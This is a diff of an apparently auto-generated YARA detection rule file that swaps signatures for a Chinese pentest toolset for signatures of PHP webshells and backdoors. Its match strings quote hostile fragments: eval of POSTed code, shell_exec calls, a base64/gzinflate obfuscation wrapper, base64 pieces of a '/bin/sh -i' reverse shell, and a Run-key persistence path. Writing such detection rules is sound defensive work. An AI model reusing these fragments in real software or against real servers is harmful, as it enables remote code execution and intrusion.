+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6995-L7017"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
-		logic_hash = "667cd6629ca49f2200fdc0a5eb28c77c412ca25313fd9a8afb77dedfa66d2fa1"
-		score = 70
+		logic_hash = "18db4c6728f0575b4d8388dab9563ee98ca9aa5fdc8534bf76856a87820b4596"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"
+		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide
-		$s2 = "domainscan.exe" fullword wide
-		$s3 = "http://www.happysec.com/" wide
-		$s4 = "cmdshell" fullword ascii
+		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+		$s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword
+		$s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword
+		$s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword
+		$s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword
+		$s10 = "foreach ($arr as $filename) {" fullword
+		$s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 655KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V3_0 : FILE
+rule SIGNATURE_BASE_Webshell_GFS
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v3.0.exe"
+		description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7513a513-e8a3-58a8-8dd5-512ba33ff013"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L685-L701"
+		id = "bde6cfd8-466f-528a-b1e3-f874aa778010"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7019-L7035"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fa47c4affbac01ba5606c4862fdb77233c1ef656"
-		logic_hash = "fa65de4a135072f4d9a5d5711a4e2833b9d4a268a2a37c33d17e4546d172b6f1"
-		score = 70
+		logic_hash = "72a3f117cb11e1461b760c47a3de74283640b6e1daa87b24e45210213bb76609"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"
+		hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"
+		hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"
 
 	strings:
-		$s1 = "http://127.0.0.1/1.exe" fullword wide
-		$s2 = ":Rices  Forum:T00Ls.Net  [4 Fucker Te@m]" fullword wide
-		$s3 = "SkinH_EL.dll" fullword wide
+		$s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword
+		$s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword
+		$s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Netfuke_Netfuke : FILE
+rule SIGNATURE_BASE_Webshell__Crystalshell_V_1_Sosyete_Stres
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe"
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "833da5c7-e562-50e9-a2a9-54c36b0d1f61"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L703-L718"
+		id = "774f7f4c-724a-5eb0-b5de-44b389fd593d"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7036-L7056"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f89e223fd4f6f5a3c2a2ea225660ef0957fc07ba"
-		logic_hash = "86f6040b743b17fb300498b02a202d1a9090054a30d490f082b116d799c4bdb2"
-		score = 70
+		logic_hash = "78aeabe38f7457060d81c3863098b5e424bc38f13e9e86bbb6ea54827f27afcd"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"
+		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii
-		$s2 = "netfuke_%s.txt" fullword ascii
+		$s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword
+		$s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword
+		$s11 = "scrollbar-darkshadow-color: #101842;" fullword
+		$s15 = "<a bookmark=\"minipanel\">" fullword
+		$s16 = "background-color: #EBEAEA;" fullword
+		$s18 = "color: #D5ECF9;" fullword
+		$s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1840KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Manualinjection : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_10
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe"
+		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f0899003-824f-56ed-b653-9f7a77b9ec6a"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L720-L735"
+		id = "f52013d6-72ce-544c-a7ef-ae2a2ea87108"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7057-L7077"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e83d427f44783088a84e9c231c6816c214434526"
-		logic_hash = "fe8eba3b79f5bc4cf820ff51816c3f2a27d6ed8f6ab3963f88a3232c9a4b5c1e"
-		score = 70
+		logic_hash = "0bf731edef55cde5d2ad16510fb9f1a240c1a06b535af7e13300fdbea470df74"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+		hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"
 
 	strings:
-		$s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii
-		$s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii
+		$s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword
+		$s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword
+		$s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword
+		$s12 = "else if( $mode & 0xA000 ) " fullword
+		$s17 = "$s=sprintf(\"%1s\", $type); " fullword
+		$s20 = "font-size: 8pt;" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cncert_Ccdoor_CMD : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_11
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll"
+		description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ddd328a8-7ad8-5b26-9deb-3e5da801cd1b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L737-L754"
+		id = "590c5320-ef85-5522-94fd-4619749f7eb1"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7078-L7100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1c6ed7d817fa8e6534a5fd36a94f4fc2f066c9cd"
-		logic_hash = "3c068c3d21de8c071b3eec354f03423d4902ef0156bb9dcad370cf688bc03426"
-		score = 70
+		logic_hash = "5a559a26314ce603d6454efb71f1243bf89daed920ca2a495a51b94a4cca0045"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"
+		hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"
+		hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"
+		hash3 = "80aba3348434c66ac471daab949871ab16c50042"
 
 	strings:
-		$s2 = "CnCerT.CCdoor.CMD.dll" fullword wide
-		$s3 = "cmdpath" fullword ascii
-		$s4 = "Get4Bytes" fullword ascii
-		$s5 = "ExcuteCmd" fullword ascii
+		$s5 = "$filename = $backupstring.\"$filename\";" fullword
+		$s6 = "while ($file = readdir($folder)) {" fullword
+		$s7 = "if($file != \".\" && $file != \"..\")" fullword
+		$s9 = "$backupstring = \"copy_of_\";" fullword
+		$s10 = "if( file_exists($file_name))" fullword
+		$s13 = "global $file_name, $filename;" fullword
+		$s16 = "copy($file,\"$filename\");" fullword
+		$s18 = "<td width=\"49%\" height=\"142\">" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 22KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Termsrvhack : FILE
+rule SIGNATURE_BASE_Webshell__Findsock_Php_Findsock_Shell_Php_Reverse_Shell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file termsrvhack.dll"
+		description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fd582a1-3c6d-57a1-bba0-f775bb61ef00"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L756-L771"
+		id = "6567c8f1-bd7f-5844-b937-3db2d8eb7408"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7101-L7115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1c456520a7b7faf71900c71167038185f5a7d312"
-		logic_hash = "ef0b9965e2d419230a7a8425674edb356347d1e41538d19fc67f8b0fbc69091f"
-		score = 70
+		logic_hash = "2459f7114482e17f087bda4b638c29e237f2f3cb5a9e41e326ed65fc1834b6be"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"
+		hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
+		hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
 
 	strings:
-		$s1 = "The terminal server cannot issue a client license.  It was unable to issue the" wide
-		$s6 = "%s\\%s\\%d\\%d" fullword wide
+		$s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1052KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_IIS6_Iis6 : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_6
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file iis6.com"
+		description = "PHP Webshells Github Archive"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f5d49cbd-1aec-5126-ab5d-83e485fa6869"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L773-L790"
+		id = "e61ec617-565a-5b24-82f4-3677ef379a06"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7116-L7137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f0c9106d6d2eea686fd96622986b641968d0b864"
-		logic_hash = "51b2fdae6437d64661f20342711d516201740eceb2273704a6e415be2cac54f6"
-		score = 70
+		logic_hash = "7b3f2ca3cb9516ddda1b9cac2ca5eb5d9e62e1839dad041f69a3dc7a2a186897"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "1a08f5260c4a2614636dfc108091927799776b13"
+		hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s0 = "GetMod;ul" fullword ascii
-		$s1 = "excjpb" fullword ascii
-		$s2 = "LEAUT1" fullword ascii
-		$s3 = "EnumProcessModules" fullword ascii
+		$s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
+		$s5 = "echo shell_exec($com);" fullword
+		$s7 = "if($sertype == \"winda\"){" fullword
+		$s8 = "function execute($com)" fullword
+		$s12 = "echo decode(execute($cmd));" fullword
+		$s15 = "echo system($com);" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Struts2_Catbox : FILE
+rule SIGNATURE_BASE_Unpack_Injectt
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file catbox.exe"
+		description = "Webshells Auto-generated - file Injectt.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24df7a11-5ec4-5e7b-86f6-6195ca01b8f9"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L792-L807"
+		id = "80dc3086-41a6-5e30-bbf4-463500fe5e33"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7139-L7152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ee8fbd91477e056aef34fce3ade474cafa1a4304"
-		logic_hash = "20bda5c918ea38810603528a20f3406ec4e79ce999681649e8e806bf549b5359"
-		score = 70
+		hash = "8a5d2158a566c87edc999771e12d42c5"
+		logic_hash = "d8e9ed4f2604617bd6410f36ab827affa3cc6729ba996d0d9cd9c8eb0fd96533"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "'Toolmao box by gainover www.toolmao.com" fullword ascii
-		$s20 = "{external.exeScript(_toolmao_bgscript[i],'javascript',false);}}" fullword ascii
+		$s2 = "%s -Run                              -->To Install And Run The Service"
+		$s3 = "%s -Uninstall                        -->To Uninstall The Service"
+		$s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8160KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Getlsasrvaddr : FILE
+rule SIGNATURE_BASE_Hytop_Devpack_Fso
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file getlsasrvaddr.exe - WCE Amplia Security"
+		description = "Webshells Auto-generated - file fso.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fa0c0376-c5c3-5b48-b03e-86cefb547479"
-		date = "2015-06-23"
-		modified = "2022-12-21"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L809-L826"
+		id = "094eeff9-0da0-5a44-a45c-f8ee57861e7a"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7153-L7165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a897d5da98dae8d80f3c0a0ef6a07c4b42fb89ce"
-		logic_hash = "e626724430d0b74aee52783dd5abdb8ccc7b951c56041e5c166b78b7370bc402"
-		score = 70
+		hash = "b37f3cde1a08890bd822a182c3a881f6"
+		logic_hash = "9d071c1e2e0725091a2abe24759e6e71d78e29caa76b4fff77c44e3bb381b1a2"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s8 = "pingme.txt" fullword ascii
-		$s16 = ".\\lsasrv.pdb" ascii
-		$s20 = "Addresses Found: " fullword ascii
+		$s0 = "<!-- PageFSO Below -->"
+		$s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Ms10048_X64 : FILE
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Ssh
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms10048-x64.exe"
+		description = "Webshells Auto-generated - file ssh.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b65b0bad-d74c-5e7a-a613-69ef80585c23"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L828-L843"
+		id = "0b971065-df16-5092-beff-c55608447f19"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7166-L7177"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
-		logic_hash = "49addce6bef7588bf7683836a54bec6a2a646ecc3f7547083174d2255454cdf0"
-		score = 70
+		hash = "1aa5307790d72941589079989b4f900e"
+		logic_hash = "40c5a5d1d714947454f4aa9f7ed09d777cb60c23933201ac8eaf0d49452af8c6"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[ ] Creating evil window" fullword ascii
-		$s2 = "[+] Set to %d exploit half succeeded" fullword ascii
+		$s0 = "eval(gzinflate(str_rot13(base64_decode('"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 125KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Logcleaner : FILE
+rule SIGNATURE_BASE_Debug_Bdoor
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe"
+		description = "Webshells Auto-generated - file BDoor.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "63ec5e47-9f3e-547a-bbff-cac8b27ac8f7"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L845-L860"
+		id = "0938efe7-2b6d-5749-af9a-967cca85defb"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7178-L7190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ab77ed5804b0394d58717c5f844d9c0da5a9f03e"
-		logic_hash = "3be059627c39e262e7621fce637df21ddcabef91753192cec356f2f8cd58c1a3"
-		score = 70
-		quality = 83
-		tags = "FILE"
+		hash = "e4e8e31dd44beb9320922c5f49739955"
+		logic_hash = "ed8caeb96a6fc48fe23d5db078bbb8ba5aec3c5d4ee382cbc6bc4e01630f1460"
+		score = 75
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = ".exe <ip> [(path]" fullword ascii
-		$s4 = "LogCleaner v" ascii
+		$s1 = "\\BDoor\\"
+		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Shell_Brute_Tool : FILE
+rule SIGNATURE_BASE_Bin_Client
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file shell_brute_tool.exe"
+		description = "Webshells Auto-generated - file Client.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80fd0c9f-0ed9-5308-ac72-65b9b3b47ed1"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L862-L877"
+		id = "8564d787-5edc-59b0-b1ef-2f33c8a24f82"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7191-L7205"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f6903a15453698c35dce841e4d09c542f9480f01"
-		logic_hash = "723fd18e59c0017b67a035ec7c685169c517d673c2bbc8fe93071b8dbd1e606a"
-		score = 70
+		hash = "5f91a5b46d155cacf0cc6673a2a5461b"
+		logic_hash = "28ce9aa136b5d41bb580e6b5b8580d3ccbb7eeec31007e68241d23c5a0f40d40"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://24hack.com/xyadmin.asp" fullword ascii
-		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s0 = "Recieved respond from server!!"
+		$s4 = "packet door client"
+		$s5 = "input source port(whatever you want):"
+		$s7 = "Packet sent,waiting for reply..."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Hxdef100 : FILE
+rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Zxshell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file hxdef100.exe"
+		description = "Webshells Auto-generated - file ZXshell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3b931752-85ae-52d0-9deb-1a1b03b39e32"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L879-L895"
+		id = "621ac87e-b1f8-58d7-9328-54af5ca9b605"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7206-L7218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bf30ccc565ac40073b867d4c7f5c33c6bc1920d6"
-		logic_hash = "49f15482104297f0c57713712a7add49d58007afeefd11151dc5749b755860ba"
-		score = 70
+		hash = "246ce44502d2f6002d720d350e26c288"
+		logic_hash = "72eaf90551144eccb7329e0a0e05bcc955ea2bfdb37aa87e9cae7b5f5a26bea0"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "BACKDOORSHELL" fullword ascii
-		$s15 = "%tmpdir%" fullword ascii
-		$s16 = "%cmddir%" fullword ascii
+		$s0 = "WPreviewPagesn"
+		$s1 = "DA!OLUTELY N"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Arp_EMP_V1_0 : FILE
+rule SIGNATURE_BASE_Rkntload
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe"
+		description = "Webshells Auto-generated - file RkNTLoad.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "03782e94-4fac-529f-b235-19cdb124d53b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L897-L911"
+		id = "fd4b1343-5fa9-5ad8-bee1-6b06b93ddfbe"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7219-L7237"
